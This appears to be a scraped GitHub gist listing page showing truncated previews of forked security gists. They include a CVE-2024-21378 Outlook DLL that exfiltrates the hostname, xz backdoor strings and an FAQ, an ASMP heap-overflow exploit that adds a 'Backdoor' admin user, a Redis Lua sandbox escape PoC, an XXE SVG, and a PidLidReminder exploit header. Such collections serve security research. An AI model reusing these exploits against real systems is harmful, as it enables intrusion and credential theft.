infernalheaven

## README.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / README.md
            
            
              Created
              June 5, 2024 12:18
                — forked from Theldus/README.md
            
              
                The only proper way to debug 16-bit (x86) code on Qemu+GDB
              
          
    The only proper way to debug 16-bit code on Qemu+GDB

(or nearly so...)
GDB is undeniably an extremely versatile debugger, with the ability to add breakpoints, watchpoints, dump memory, registers, and the source code (along with its corresponding assembly). These features make it the perfect Swiss Army knife for most programmers. In addition to that, the possibility of implementing a 'GDB Stub' and automatically supporting GDB in your application makes it an almost universal debugger for a variety of tasks.
Qemu, like other virtual machines (such as 86Box), also implements debugging via GDB Stub, which enormously facilitates the development of bootloaders, operating systems, and more. The support for 32-bit and 64-bit code is quite good, and I have never seen any complaints about it. However, for 16-bit/real mode...
Is debugging in 16-bit/real mode really that bad?

If you have ever tried to debug 16-bit code on Qemu, you know how painful it can be:

GDB thinks your code is


## test_dll.c
/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability,
 *    specifically targeting MS Outlook.
 *
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

## hashes.txt
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'

## xz-backdoor.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / xz-backdoor.md
            
            
              Created
              March 29, 2024 22:02
                — forked from thesamesam/xz-backdoor.md
            
              
                xz-utils backdoor situation
              
          
    FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in
xz-utils, a suite of software that
gives developers lossless compression. This package is commonly used
for compressing release tarballs, software packages, kernel images,
and initramfs images. It is very widely distributed, statistically
your average Linux or macOS system will have it installed for

  
## OpenSSL cheat sheet for socket programmers.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / OpenSSL cheat sheet for socket programmers.md
            
            
              Created
              January 9, 2024 16:29
                — forked from azadkuh/OpenSSL cheat sheet for socket programmers.md
            
              
                OpenSSL cheat sheet. This is a brief howto for socket programmers.
              
          
    #OpenSSL cheat sheet
This is a brief howto for socket programmers.
create RSA key pairs

ex: 1024bits length key pair:
$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem

  
## asmpwn.py
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8  = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211  # port is hardcoded in the binary
    usernm = username.encode()

## Redis CVE-2015-4335 EVAL Lua Sandbox Security Bypass Vulnerability PoC
#!/usr/bin/env python
# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl

import sys
import time
import getopt
import socket

'''
Gives the hexadecimal representation of "command"

## host_getter.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                infernalheaven
                / host_getter.svg
            
            
              Created
              April 17, 2023 12:44
                — forked from jakekarnes42/host_getter.svg
            
              
                An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
              
          
        Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## find_symbol.sh
#!/bin/bash
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}:   " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME"

## PidLidReminderPwn.py
#!/usr/bin/python -u

from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW

from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
	/**
	* This DLL is designed for use in conjunction with the Ruler tool for
	* security testing related to the CVE-2024-21378 vulnerability,
	* specifically targeting MS Outlook.
	*
	* It can be used with the following command line syntax:
	* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
	* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
	*
	* After being loaded into MS Outlook, it sends the PC's hostname and
	0810 b' from '
	0678 b' ssh2'
	00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
	0708 b'%s'
	0108 b'/usr/sbin/sshd\x00'
	0870 b'Accepted password for '
	01a0 b'Accepted publickey for '
	0c40 b'BN_bin2bn\x00'
	06d0 b'BN_bn2bin\x00'
	0958 b'BN_dup\x00'
	import socket, struct, sys
	p32 = lambda x: struct.pack(">I", x)
	p16 = lambda x: struct.pack(">h", x)
	p8 = lambda x: struct.pack(">b", x)

	# ASMP heap overflow exploit creates new applianceAdmin user
	def exploit(hostname, username="Backdoor", password="Backdoor"):
	global socks # python closes out of scope sockets
	port = 3211 # port is hardcoded in the binary
	usernm = username.encode()
	#!/usr/bin/env python
	# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl

	import sys
	import time
	import getopt
	import socket

	'''
	Gives the hexadecimal representation of "command"
	#!/bin/bash
	SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 \| grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; \| grep -e " $SYMBOL_NAME"
	#!/usr/bin/python -u

	from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
	from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW

	from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
	BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter

	import urllib3
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)